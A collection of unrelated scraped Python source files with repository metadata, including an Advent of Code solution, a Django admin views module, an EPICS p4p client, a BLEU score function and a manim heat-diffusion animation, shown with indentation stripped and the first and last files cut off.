minX = tile[0]
if tile[0] > maxX:
maxX = tile[0]
if tile[1] < minY:
minY = tile[1]
if tile[1] > maxY:
maxY = tile[1]
for y in range(minY-1,maxY+2):
for x in range(minX-1,maxX+2):
testTile = (x,y)
isFlipped = testTile in flippedTiles
numAdjacent = GetNumAdjacent(flippedTiles, testTile)
if isFlipped and (numAdjacent == 0 or numAdjacent > 2):
newFlippedTiles.remove(testTile)
elif (not isFlipped) and (numAdjacent == 2):
newFlippedTiles.add(testTile)
flippedTiles = newFlippedTiles
print(len(flippedTiles))
| Chromega/adventofcode | 2020/Day24/day24.py | day24.py | py | 3,786 | python | en | code | 0 | github-code | 13 |
11193176216 | # modified version of binary search that returns the index
# within a sorted sequence indication where the target
# shold be located
def findSortedPosition( theList, target):
low = 0
high = len(theList) - 1
while low <= high:
mid = (low+high)//2
if theList[mid] == target:
return mid # index of the target
elif theList[mid] > target:
high = mid - 1
else:
low = mid + 1
return low # index where the target value should be
| Shaunwei/Python4Fun | algorithmAndDataS/SearchingAndSorting/findSortedPosition.py | findSortedPosition.py | py | 522 | python | en | code | 0 | github-code | 13 |
24823123662 | from __future__ import annotations
from plumbum import cli # type: ignore
from pathlib import Path
from quangis_workflows.namespace import CCD, EM, EX
from quangis_workflows.generator import WorkflowGenerator
from quangis_workflows.types import Polytype
sources = [
(CCD.FieldQ, CCD.VectorTessellationA, CCD.PlainNominalA), # VectorCoverage
(CCD.FieldQ, CCD.VectorTessellationA, CCD.PlainOrdinalA), # Contour
(CCD.FieldQ, CCD.PointA, CCD.PlainIntervalA), # PointMeasures
(CCD.FieldQ, CCD.PointA, CCD.PlainRatioA), # PointMeasures
(CCD.FieldQ, CCD.LineA, CCD.PlainIntervalA), # LineMeasures (isolines)
(CCD.FieldQ, CCD.LineA, CCD.PlainRatioA), # LineMeasures (isolines)
(CCD.FieldQ, CCD.PlainVectorRegionA, CCD.PlainNominalA), # Patch
(CCD.FieldQ, CCD.RasterA, CCD.PlainIntervalA), # Field Raster
(CCD.FieldQ, CCD.RasterA, CCD.PlainRatioA), # Field Raster
# Commented out because there are actually no tools which accept this
# input, which makes APE very very mad.
# (CCD.AmountQ, CCD.RasterA, CCD.CountA), # Count Raster
# (CCD.AmountQ, CCD.PlainVectorRegionA, CCD.CountA), # Count Vector
# (CCD.AmountQ, CCD.PointA, CCD.CountA), # Count Vector
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainNominalA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainOrdinalA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainIntervalA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, EM.ERA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, EM.IRA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainRatioA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.CountA), # Lattice
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainNominalA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainOrdinalA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainIntervalA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.ERA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.IRA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainRatioA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.CountA), # ObjectRegion
(CCD.ObjectQ, CCD.PointA, CCD.PlainNominalA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.PlainOrdinalA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.PlainIntervalA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, EM.ERA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, EM.IRA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.PlainRatioA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.CountA), # ObjectPoint
]
goals = [
(CCD.FieldQ, CCD.PlainVectorRegionA, CCD.NominalA),
(CCD.FieldQ, CCD.VectorTessellationA, CCD.NominalA),
(CCD.FieldQ, CCD.VectorTessellationA, CCD.OrdinalA),
(CCD.FieldQ, CCD.RasterA, CCD.IntervalA),
(CCD.FieldQ, CCD.RasterA, CCD.RatioA),
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.IntervalA),
(CCD.ObjectQ, CCD.VectorTessellationA, EM.ERA),
(CCD.ObjectQ, CCD.VectorTessellationA, EM.IRA),
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.CountA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.IntervalA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.ERA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.IRA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.CountA),
]
def generate_workflows() -> None:
"""
Generate workflows using APE with the CCD type taxonomy and the GIS tool
ontology.
"""
build_dir = Path(__file__).parent / "build"
gen = WorkflowGenerator(build_dir)
# To start with, we generate workflows with two inputs and one output, of
# which one input is drawn from the following sources, and the other is the
# same as the output without the measurement level.
inputs_outputs: list[tuple[str, list[Polytype], list[Polytype]]] = []
for goal_tuple in goals:
goal = Polytype(gen.dimensions, goal_tuple)
source1 = Polytype(goal)
source1[CCD.NominalA] = {CCD.NominalA}
for source_tuple in sources:
source2 = Polytype(gen.dimensions, source_tuple)
inputs_outputs.append((
f"{source1.short()}+{source2.short()}_{goal.short()}_",
[source1, source2], [goal]))
running_total = 0
for run, (name, inputs, outputs) in enumerate(inputs_outputs):
for solution in gen.run(inputs, outputs, solutions=1, prefix=EX[name]):
running_total += 1
path = build_dir / f"solution{running_total}.ttl"
print(f"Writing solution: {path}")
solution.serialize(path, format="ttl")
class CLI(cli.Application):
"""
Generate workflows using APE with the CCD type taxonomy and the GIS tool
ontology.
"""
PROGNAME = "quangis-wf-gen"
def main(self, *args):
generate_workflows()
def main():
CLI.run()
if __name__ == '__main__':
main()
| quangis/quangis-workflows | quangis_workflows/cli/wf_gen.py | wf_gen.py | py | 4,947 | python | en | code | 0 | github-code | 13 |
17531004519 |
from __future__ import print_function
import logging
import sys
_log = logging.getLogger(__name__)
try:
from itertools import izip
except ImportError:
izip = zip
from functools import partial
import json
import threading
try:
from Queue import Queue, Full, Empty
except ImportError:
from queue import Queue, Full, Empty
from . import raw
from .raw import Disconnected, RemoteError, Cancelled, Finished
from ..util import _defaultWorkQueue
from ..wrapper import Value, Type
from ..rpc import WorkQueue
from .._p4p import (logLevelAll, logLevelTrace, logLevelDebug,
logLevelInfo, logLevelWarn, logLevelError,
logLevelFatal, logLevelOff)
__all__ = [
'Context',
'Value',
'Type',
'RemoteError',
'TimeoutError',
]
if sys.version_info >= (3, 0):
unicode = str
TimeoutError = TimeoutError
else:
class TimeoutError(RuntimeError):
"Local timeout has expired"
def __init__(self):
RuntimeError.__init__(self, 'Timeout')
class Subscription(object):
"""An active subscription.
Returned by `Context.monitor`.
"""
def __init__(self, ctxt, name, cb, notify_disconnect=False, queue=None):
self.name, self._S, self._cb = name, None, cb
self._notify_disconnect = notify_disconnect
self._Q = queue or ctxt._Q or _defaultWorkQueue()
if notify_disconnect:
# all subscriptions are inittially disconnected
self._Q.push_wait(partial(cb, Disconnected()))
def close(self):
"""Close subscription.
"""
if self._S is not None:
# after .close() self._event should never be called
self._S.close()
self._S = None
def __enter__(self):
return self
def __exit__(self, A, B, C):
self.close()
@property
def done(self):
'Has all data for this subscription been received?'
return self._S is None or self._S.done()
@property
def empty(self):
'Is data pending in event queue?'
return self._S is None or self._S.empty()
def _event(self):
try:
assert self._S is not None, self._S
_log.debug('Subscription wakeup for %s', self.name)
self._Q.push(self._handle)
except:
_log.exception("Lost Subscription update for %s", self.name)
def _handle(self):
try:
S = self._S
if S is None: # already close()'d
return
for n in range(4):
E = S.pop()
if E is None:
break # monitor queue empty
elif isinstance(E, Exception):
_log.debug('Subscription notify for %s with %s', self.name, E)
if self._notify_disconnect:
self._cb(E)
elif isinstance(E, RemoteError):
_log.error("Subscription Error %s", E)
if isinstance(E, Finished):
_log.debug('Subscription complete %s', self.name)
self._S = None
S.close()
else:
self._cb(E)
if E is not None:
# removed 4 elements without emptying queue
# re-schedule to mux with others
self._Q.push(self._handle)
except:
_log.exception("Error processing Subscription event for %s", self.name)
if self._S is not None:
self._S.close()
self._S = None
class Context(raw.Context):
"""Context(provider, conf=None, useenv=True)
:param str provider: A Provider name. Try "pva" or run :py:meth:`Context.providers` for a complete list.
:param dict conf: Configuration to pass to provider. Depends on provider selected.
:param bool useenv: Allow the provider to use configuration from the process environment.
:param int workers: Size of thread pool in which monitor callbacks are run. Default is 4
:param int maxsize: Size of internal work queue used for monitor callbacks. Default is unlimited
:param dict nt: Controls :ref:`unwrap`. None uses defaults. Set False to disable
:param dict unwrap: Legacy :ref:`unwrap`.
:param WorkQueue queue: A work queue through which monitor callbacks are dispatched.
The methods of this Context will block the calling thread until completion or timeout
The meaning, and allowed keys, of the configuration dictionary depend on the provider.
conf= will override values taken from the process environment. Pass useenv=False to
ensure that environment variables are completely ignored.
The "pva" provider understands the following keys:
* EPICS_PVA_ADDR_LIST
* EPICS_PVA_AUTO_ADDR_LIST
* EPICS_PVA_SERVER_PORT
* EPICS_PVA_BROADCAST_PORT
"""
Value = Value
name = ''
"Provider name string"
def __init__(self, provider='pva', conf=None, useenv=True, nt=None, unwrap=None,
maxsize=0, queue=None):
self._channel_lock = threading.Lock()
super(Context, self).__init__(provider, conf=conf, useenv=useenv, nt=nt, unwrap=unwrap)
# lazy start threaded WorkQueue
self._Q = self._T = None
self._Q = queue
def _channel(self, name):
with self._channel_lock:
return super(Context, self)._channel(name)
def disconnect(self, *args, **kws):
with self._channel_lock:
super(Context, self).disconnect(*args, **kws)
def _queue(self):
if self._Q is None:
Q = WorkQueue(maxsize=self._Qmax)
Ts = []
for n in range(self._Wcnt):
T = threading.Thread(name='p4p Context worker', target=Q.handle)
T.daemon = True
Ts.append(T)
for T in Ts:
T.start()
_log.debug('Started %d Context worker', self._Wcnt)
self._Q, self._T = Q, Ts
return self._Q
def close(self):
"""Force close all Channels and cancel all Operations
"""
if self._Q is not None:
for T in self._T:
self._Q.interrupt()
for n, T in enumerate(self._T):
_log.debug('Join Context worker %d', n)
T.join()
_log.debug('Joined Context workers')
self._Q, self._T = None, None
if not Context:
# Python 2.7 GC removes Context from scope during destruction of objects.
return
super(Context, self).close()
def get(self, name, request=None, timeout=5.0, throw=True):
"""Fetch current value of some number of PVs.
:param name: A single name string or list of name strings
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param float timeout: Operation timeout in seconds
:param bool throw: When true, operation error throws an exception. If False then the Exception is returned instead of the Value
:returns: A p4p.Value or Exception, or list of same. Subject to :py:ref:`unwrap`.
When invoked with a single name then returns is a single value.
When invoked with a list of name, then returns a list of values
>>> ctxt = Context('pva')
>>> V = ctxt.get('pv:name')
>>> A, B = ctxt.get(['pv:1', 'pv:2'])
>>>
"""
singlepv = isinstance(name, (bytes, unicode))
if singlepv:
name = [name]
request = [request]
elif request is None:
request = [None] * len(name)
assert len(name) == len(request), (name, request)
# use Queue instead of Event to allow KeyboardInterrupt
done = Queue()
result = [TimeoutError()] * len(name)
ops = [None] * len(name)
raw_get = super(Context, self).get
try:
for i, (N, req) in enumerate(izip(name, request)):
def cb(value, i=i):
try:
if not isinstance(value, Cancelled):
done.put_nowait((value, i))
_log.debug('get %s Q %r', N, value)
except:
_log.exception("Error queuing get result %s", value)
_log.debug('get %s w/ %s', N, req)
ops[i] = raw_get(N, cb, request=req)
for _n in range(len(name)):
try:
value, i = done.get(timeout=timeout)
except Empty:
if throw:
_log.debug('timeout %s after %s', name[i], timeout)
raise TimeoutError()
break
_log.debug('got %s %r', name[i], value)
if throw and isinstance(value, Exception):
raise value
result[i] = value
finally:
[op and op.close() for op in ops]
if singlepv:
return result[0]
else:
return result
def put(self, name, values, request=None, timeout=5.0, throw=True,
process=None, wait=None, get=True):
"""Write a new value of some number of PVs.
:param name: A single name string or list of name strings
:param values: A single value, a list of values, a dict, a `Value`. May be modified by the constructor nt= argument.
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param float timeout: Operation timeout in seconds
:param bool throw: When true, operation error throws an exception.
If False then the Exception is returned instead of the Value
:param str process: Control remote processing. May be 'true', 'false', 'passive', or None.
:param bool wait: Wait for all server processing to complete.
:param bool get: Whether to do a Get before the Put. If True then the value passed to the builder callable
will be initialized with recent PV values. eg. use this with NTEnum to find the enumeration list.
:returns: A None or Exception, or list of same
When invoked with a single name then returns is a single value.
When invoked with a list of name, then returns a list of values
If 'wait' or 'process' is specified, then 'request' must be omitted or None.
>>> ctxt = Context('pva')
>>> ctxt.put('pv:name', 5.0)
>>> ctxt.put(['pv:1', 'pv:2'], [1.0, 2.0])
>>> ctxt.put('pv:name', {'value':5})
>>>
The provided value(s) will be automatically coerced to the target type.
If this is not possible then an Exception is raised/returned.
Unless the provided value is a dict, it is assumed to be a plain value
and an attempt is made to store it in '.value' field.
"""
singlepv = isinstance(name, (bytes, unicode))
if request and (process or wait is not None):
raise ValueError("request= is mutually exclusive to process= or wait=")
elif process or wait is not None:
request = 'field()record[block=%s,process=%s]' % ('true' if wait else 'false', process or 'passive')
if not singlepv:
request = [request]*len(name)
if singlepv:
name = [name]
values = [values]
request = [request]
elif request is None:
request = [None] * len(name)
assert len(name) == len(request), (name, request)
assert len(name) == len(values), (name, values)
# use Queue instead of Event to allow KeyboardInterrupt
done = Queue()
result = [TimeoutError()] * len(name)
ops = [None] * len(name)
raw_put = super(Context, self).put
try:
for i, (n, value, req) in enumerate(izip(name, values, request)):
if isinstance(value, (bytes, unicode)) and value[:1] == '{':
try:
value = json.loads(value)
except ValueError:
raise ValueError("Unable to interpret '%s' as json" % value)
# completion callback
def cb(value, i=i):
try:
done.put_nowait((value, i))
except:
_log.exception("Error queuing put result %r", value)
ops[i] = raw_put(n, cb, builder=value, request=req, get=get)
for _n in range(len(name)):
try:
value, i = done.get(timeout=timeout)
except Empty:
if throw:
raise TimeoutError()
break
if throw and isinstance(value, Exception):
raise value
result[i] = value
if singlepv:
return result[0]
else:
return result
finally:
[op and op.close() for op in ops]
def rpc(self, name, value, request=None, timeout=5.0, throw=True):
"""Perform a Remote Procedure Call (RPC) operation
:param str name: PV name string
:param Value value: Arguments. Must be Value instance
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param float timeout: Operation timeout in seconds
:param bool throw: When true, operation error throws an exception.
If False then the Exception is returned instead of the Value
:returns: A Value or Exception. Subject to :py:ref:`unwrap`.
>>> ctxt = Context('pva')
>>> ctxt.rpc('pv:name:add', {'A':5, 'B'; 6})
>>>
The provided value(s) will be automatically coerced to the target type.
If this is not possible then an Exception is raised/returned.
Unless the provided value is a dict, it is assumed to be a plain value
and an attempt is made to store it in '.value' field.
"""
done = Queue()
op = super(Context, self).rpc(name, done.put_nowait, value, request=request)
try:
try:
result = done.get(timeout=timeout)
except Empty:
result = TimeoutError()
if throw and isinstance(result, Exception):
raise result
return result
except:
op.close()
raise
def monitor(self, name, cb, request=None, notify_disconnect=False, queue=None):
"""Create a subscription.
:param str name: PV name string
:param callable cb: Processing callback
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param bool notify_disconnect: In additional to Values, the callback may also be call with instances of Exception.
Specifically: Disconnected , RemoteError, or Cancelled
:param WorkQueue queue: A work queue through which monitor callbacks are dispatched.
:returns: a :py:class:`Subscription` instance
The callable will be invoked with one argument which is either.
* A p4p.Value (Subject to :py:ref:`unwrap`)
* A sub-class of Exception (Disconnected , RemoteError, or Cancelled)
"""
R = Subscription(self, name, cb, notify_disconnect=notify_disconnect, queue=queue)
R._S = super(Context, self).monitor(name, R._event, request)
return R
| mdavidsaver/p4p | src/p4p/client/thread.py | thread.py | py | 15,778 | python | en | code | 20 | github-code | 13 |
38889852083 | #! python3
# a program to roll dice
from random import randint
from plotly.graph_objs import Bar,Layout
from plotly import offline
class Dice():
"""A class to roll dice """
def __init__(self,dice_num=6):
self.dice_num=dice_num
"""Rolling the dice"""
def roll(self):
return randint(1,self.dice_num)
if __name__=='main':
dice=Dice()
#Make some roll and store the results in a list
results=[]
for i in range(100000):
results.append(dice.roll())
#Analyst the result
frequencies=[]
for i in range(1,dice.dice_num+1):
frequencies.append(results.count(i))
#Visualize the data with histogram
x_values=list(range(1,dice.dice_num+1))
bar_data=[Bar(x=x_values,y=frequencies)]
x_axis_config={'title':'Results'}
y_axis_config={'title':'Frequencie of results'}
layout=Layout(title='Results of rolling dice 1000 times',xaxis=x_axis_config,yaxis=y_axis_config)
offline.plot({'data':bar_data,'layout':layout},filename='d6.html') | DrakeChow3/Stupid-stuff | Script1/rollingDice.py | rollingDice.py | py | 1,051 | python | en | code | 0 | github-code | 13 |
26455187113 | class Solution:
def removeElement(self, nums, val):
# nums = list(filter(lambda x: x!=val, nums))
# return len(nums)
# while val in nums:
# nums.remove(val)
# return len(nums)
# accepted answer
l = 0
for i in range(len(nums)):
if nums[i] != val:
nums[l] = nums[i]
l += 1
return l
if __name__ == '__main__':
sol = Solution()
print(sol.removeElement([1, 1, 2, 2], 2)) | Eyakub/Problem-solving | LeetCode/remove_element.py | remove_element.py | py | 500 | python | en | code | 3 | github-code | 13 |
15288499552 | from django.shortcuts import render, redirect
import datetime
import json
from django.core import serializers
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from admin.models import *
def index(request):
context = {}
return render(request, 'admin/admin.html', context)
def testsolr(request):
a = SearchQuerySet().models(Business).filter(name="chic")
context = {'result': a}
return render(request, 'admin/solrtest.html', context)
def admin_espanol(request):
context = {}
return render(request, 'admin/admin-espanol.html', context)
def admin_translate(request):
context = {}
return render(request, 'admin/admin-translate.html', context)
def admin_espanol_edit(request):
context = {}
return render(request, 'admin/admin-espanol.html', context)
def categories(request):
context = {}
return render(request, 'admin/admin-cat.html', context)
def edit_category(request, cid=None):
context = {'cid': cid}
return render(request, 'admin/admin-edit.html', context)
def results_page(request, category):
context = { 'catid': catid }
return render(request, 'admin/results.html', context)
def company_page(request, company_slug):
context = { 'company': company_slug }
return render(request, 'admin/sample-page.html', context)
def manage_featured(request):
context = {}
return render(request, 'admin/manage_featured.html', context)
# -------------- Admin Functions --------------------- #
def missing_photo_list(request):
bizs = Business.objects.all()
biz_without = []
for biz in bizs:
photos = BusinessImages.objects.filter(business_id=biz.id)
if not photos:
biz_without.append(biz.name + "<br />")
return HttpResponse(biz_without)
def fish_prices(request):
now = datetime.datetime.now()
today = now.date()
fp = FishPrices.objects.filter(fish_date=today)
fishies = []
for f in fp:
fishdict = {}
fishdict['name_english'] = f.fishname_english
fishdict['name_spanish'] = f.fishname_spanish
fishdict['price'] = f.price
fishdict['description'] = f.fish_description
fishdict['date'] = f.fish_date
fishdict['id'] = f.id
fishies.append(fishdict)
context = {'fishies': fishies}
return render(request, 'admin/fish_prices.html', context)
def add_fish_prices(request):
now = datetime.datetime.now()
today = now.date()
if request.method == "POST":
name_english = request.POST['fishname_english']
name_spanish = request.POST['fishname_spanish']
price = request.POST['price']
desc = request.POST['fish_description']
#date = request.POST['date']
f = FishPrices(fishname_english=name_english, fishname_spanish=name_spanish, fish_description=desc, price=price, fish_date=today)
f.save()
return HttpResponseRedirect('/admin/fish_prices/')
def del_fish_price(request, fishid=None):
if fishid:
f = FishPrices.objects.get(pk=fishid)
f.delete()
return HttpResponseRedirect('/admin/fish_prices/')
| kharron/sjdsdirectory | admin/views.py | views.py | py | 3,415 | python | en | code | 0 | github-code | 13 |
73607409936 | from collections import Counter as counter
from typing import Counter, Optional, Sequence, Tuple, Union
import torch
def bleu_score(
input: Union[str, Sequence[str]],
target: Sequence[Union[str, Sequence[str]]],
n_gram: int = 4,
weights: Optional[torch.Tensor] = None,
device: Optional[torch.device] = None,
) -> torch.Tensor:
"""
Compute BLEU score given translations and references for each translation.
Its class version is ``torcheval.metrics.texBLEUScore``.
Args:
input: Translations to score.
target: List of references for each translation. Requires len(input) = len(target)
n_gram: Maximum n-gram to use when computing BLEU score. Can be 1, 2, 3, or 4.
weights: Optional weight distribution of n-grams. Requires len(weights) = n_gram. If unspecified,
will use uniform weights.
Examples:
>>> import torch
>>> from torcheval.metrics.functional.text import bleu
>>> candidates = ["the squirrel is eating the nut"]
>>> references = [["a squirrel is eating a nut", "the squirrel is eating a tasty nut"]]
>>> bleu_score(candidates, references, n_gram=4)
tensor(0.53728497)
>>> candidates = ["the squirrel is eating the nut", "the cat is on the mat"]
>>> references = [["a squirrel is eating a nut", "the squirrel is eating a tasty nut"], ["there is a cat on the mat", "a cat is on the mat"]]
>>> bleu_score(candidates, references, n_gram=4)
tensor(0.65341892)
"""
(
input_len,
target_len,
matches_by_order,
possible_matches_by_order,
) = _bleu_score_update(
input,
target,
n_gram,
device,
)
return _bleu_score_compute(
input_len,
target_len,
matches_by_order,
possible_matches_by_order,
n_gram,
weights,
)
def _bleu_score_update(
input: Union[str, Sequence[str]],
target: Sequence[Union[str, Sequence[str]]],
n_gram: int,
device: Optional[torch.device] = None,
) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
input_ = [input] if isinstance(input, str) else input
target_ = [[tgt] if isinstance(tgt, str) else tgt for tgt in target]
if len(input_) != len(target_):
raise ValueError(
f"Input and target corpus should have same sizes, but input corpus size = {len(input_)}, target corpus size = {len(target_)} "
)
input_len = torch.tensor(0, device=device)
target_len = torch.tensor(0, device=device)
matches_by_order = torch.zeros(n_gram, device=device)
possible_matches_by_order = torch.zeros(n_gram, device=device)
for (candidate, references) in zip(input_, target_):
candidate_tokenized = candidate.split()
references_tokenized = [ref.split() for ref in references]
len_candidate = len(candidate_tokenized)
len_reference = min([len(ref) for ref in references_tokenized])
input_len += len_candidate
target_len += len_reference
candidate_ngram_counter = _get_ngrams(candidate_tokenized, n_gram)
reference_ngram_counter = counter()
for ref in references_tokenized:
reference_ngram_counter |= _get_ngrams(ref, n_gram)
overlap = candidate_ngram_counter & reference_ngram_counter
for ngram in overlap:
matches_by_order[len(ngram) - 1] += overlap[ngram]
for i in range(n_gram):
if len_candidate - i > 0:
possible_matches_by_order[i] += len_candidate - i
if torch.min(possible_matches_by_order) == 0:
raise ValueError(
f"the input is too short to find all n-gram matches with n_gram={n_gram}"
)
return input_len, target_len, matches_by_order, possible_matches_by_order
def _bleu_score_compute(
input_len: torch.Tensor,
target_len: torch.Tensor,
matches_by_order: torch.Tensor,
possible_matches_by_order: torch.Tensor,
n_gram: int,
weights: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if weights is not None and n_gram != weights.size(dim=0):
raise ValueError(
f"the length of weights should equal n_gram, got len(weights)={weights.size(dim=0)}, n_gram={n_gram}"
)
if weights is None:
weights = torch.tensor([1 / n_gram] * n_gram)
precisions = matches_by_order / possible_matches_by_order
geometric_mean = torch.exp(torch.sum(weights * torch.log(precisions)))
brevity_penalty = _calc_brevity_penalty(input_len, target_len)
return brevity_penalty * geometric_mean
def _calc_brevity_penalty(
input_len: torch.Tensor, target_len: torch.Tensor
) -> torch.Tensor:
if input_len > target_len:
return torch.tensor(1.0, device=input_len.device)
else:
return torch.exp(1 - target_len / input_len)
def _get_ngrams(sentence: Sequence[str], n_gram: int) -> Counter[str]:
"""
Args:
sentence: text from which we get n-grams
n_gram: length of n-gram
"""
if n_gram not in [1, 2, 3, 4]:
raise ValueError(f"n_gram should be 1, 2, 3, or 4, got {n_gram}.")
ngram_counts = counter()
for n_val in range(1, n_gram + 1):
for i in range(0, len(sentence) - n_val + 1):
ngram = tuple(sentence[i : i + n_val])
ngram_counts[ngram] += 1
return ngram_counts
| pytorch/torcheval | torcheval/metrics/functional/text/bleu.py | bleu.py | py | 5,473 | python | en | code | 155 | github-code | 13 |
33942931130 | import logging
import time
from functools import lru_cache
from typing import List
import numpy as np
import psutil
from recommendations.estimator import discover_models
from recommendations.resolvers import get_resolvers
log = logging.getLogger(__name__)
@lru_cache(maxsize=None)
def load_model(model_name, *args, **kwargs):
"""Load model and initialize it. Cache it."""
models = discover_models()
if model_name not in models:
raise ValueError(f"Unknown model `{model_name}`")
start = time.time()
rss_start = psutil.Process().memory_info().rss
model = models[model_name](*args, **kwargs)
log.info(
f"Model `{model_name}` loaded in {time.time() - start:.2f} seconds,"
f" RSS: {(psutil.Process().memory_info().rss - rss_start) / 1024 / 1024:.2f} Mb"
)
return model
def safe_recommend(
model_name: str,
user_ids: List[int],
n_recs: int,
resolution_strategy="pure_random",
):
"""
Safe recommendation.
Args:
model_name: model name
user_ids: user ids
n_recs: number of recommendations
resolution_strategy: resolution strategy if error occurs
Returns:
np.array: array of recommendations
"""
resolvers = get_resolvers()
if resolution_strategy not in resolvers:
raise ValueError(f"Unknown resolution strategy `{resolution_strategy}`")
try:
model = load_model(model_name)
recommendations = model.recommend(user_ids, n_recs)
unique = []
# Create a list of unique recommendations
for rec in recommendations:
if rec not in unique:
unique.append(rec)
# If there are not enough unique recommendations, use the resolution strategy
# to get additional recommendations
if len(unique) < n_recs:
resolved = resolvers[resolution_strategy](user_ids, n_recs)
for x in resolved:
if x not in unique:
unique.append(x)
# Stop when we have enough unique recommendations
if len(unique) == n_recs:
break
# Return the first n_recs unique recommendations
return np.array(unique[:n_recs])
except Exception as e:
log.error(e)
return resolvers[resolution_strategy](user_ids, n_recs)
| YUNGC0DE/RecoServiceTeam30 | recommendations/model_utils.py | model_utils.py | py | 2,372 | python | en | code | null | github-code | 13 |
36791156934 | from manimlib import *
class BringTwoRodsTogether(Scene):
CONFIG = {
"step_size": 0.05,
"axes_config": {
"x_min": -1,
"x_max": 11,
"y_min": -10,
"y_max": 100,
"y_axis_config": {
"unit_size": 0.06,
"tick_frequency": 10,
},
},
"y_labels": range(20, 100, 20),
"graph_x_min": 0,
"graph_x_max": 10,
"midpoint": 5,
"max_temp": 90,
"min_temp": 10,
"wait_time": 30,
"default_n_rod_pieces": 20,
"alpha": 1.0,
}
def construct(self):
self.setup_axes()
self.setup_graph()
self.setup_clock()
self.show_rods()
self.show_equilibration()
def setup_axes(self):
axes = Axes(**self.axes_config)
axes.center().to_edge(UP)
y_label = axes.get_y_axis_label("\\text{Temperature}")
y_label.to_edge(UP)
axes.y_axis.label = y_label
axes.y_axis.add(y_label)
axes.y_axis.add_numbers(*self.y_labels)
self.axes = axes
self.y_label = y_label
def setup_graph(self):
graph = self.axes.get_graph(
self.initial_function,
x_min=self.graph_x_min,
x_max=self.graph_x_max,
step_size=self.step_size,
discontinuities=[self.midpoint],
)
graph.color_using_background_image("VerticalTempGradient")
self.graph = graph
def setup_clock(self):
clock = Clock()
clock.set_height(1)
clock.to_corner(UR)
clock.shift(MED_LARGE_BUFF * LEFT)
time_lhs = TexText("Time: ")
time_label = DecimalNumber(
0, num_decimal_places=2,
)
time_rhs = TexText("s")
time_group = VGroup(
time_lhs,
time_label,
# time_rhs
)
time_group.arrange(RIGHT, aligned_edge=DOWN)
time_rhs.shift(SMALL_BUFF * LEFT)
time_group.next_to(clock, DOWN)
self.time_group = time_group
self.time_label = time_label
self.clock = clock
def show_rods(self):
rod1, rod2 = rods = VGroup(
self.get_rod(0, 5),
self.get_rod(5, 10),
)
rod1.set_color(rod1[0].get_color())
rod2.set_color(rod2[-1].get_color())
rods.save_state()
rods.space_out_submobjects(1.5)
rods.center()
labels = VGroup(
Tex("90^\\circ"),
Tex("10^\\circ"),
)
for rod, label in zip(rods, labels):
label.next_to(rod, DOWN)
rod.label = label
self.play(
FadeIn(rod1, UP),
Write(rod1.label),
)
self.play(
FadeIn(rod2, DOWN),
Write(rod2.label)
)
self.wait()
self.rods = rods
self.rod_labels = labels
def show_equilibration(self):
rods = self.rods
axes = self.axes
graph = self.graph
labels = self.rod_labels
self.play(
Write(axes),
rods.restore,
rods.space_out_submobjects, 1.1,
FadeIn(self.time_group),
FadeIn(self.clock),
*[
MaintainPositionRelativeTo(
rod.label, rod
)
for rod in rods
],
)
br1 = Rectangle(height=0.2, width=1)
br1.set_stroke(width=0)
br1.set_fill(BLACK, opacity=1)
br2 = br1.copy()
br1.add_updater(lambda b: b.move_to(axes.c2p(0, 90)))
br1.add_updater(
lambda b: b.align_to(rods[0].get_right(), LEFT)
)
br2.add_updater(lambda b: b.move_to(axes.c2p(0, 10)))
br2.add_updater(
lambda b: b.align_to(rods[1].get_left(), RIGHT)
)
self.add(graph, br1, br2)
self.play(
ShowCreation(graph),
labels[0].align_to, axes.c2p(0, 87), UP,
labels[1].align_to, axes.c2p(0, 13), DOWN,
)
self.play()
self.play(
rods.restore,
rate_func=rush_into,
)
self.remove(br1, br2)
graph.add_updater(self.update_graph)
self.time_label.add_updater(
lambda d, dt: d.increment_value(dt)
)
rods.add_updater(self.update_rods)
self.play(
self.get_clock_anim(self.wait_time),
FadeOut(labels)
)
#
def get_clock_anim(self, time, **kwargs):
config = {
"run_time": time,
"hours_passed": time,
}
config.update(kwargs)
return ClockPassesTime(self.clock, **config)
def initial_function(self, x):
epsilon = 1e-10
if x < self.midpoint - epsilon:
return self.max_temp
elif x > self.midpoint + epsilon:
return self.min_temp
else:
return (self.min_temp + self.max_temp) / 2
def update_graph(self, graph, dt, alpha=None, n_mini_steps=500):
if alpha is None:
alpha = self.alpha
points = np.append(
graph.get_start_anchors(),
[graph.get_last_point()],
axis=0,
)
for k in range(n_mini_steps):
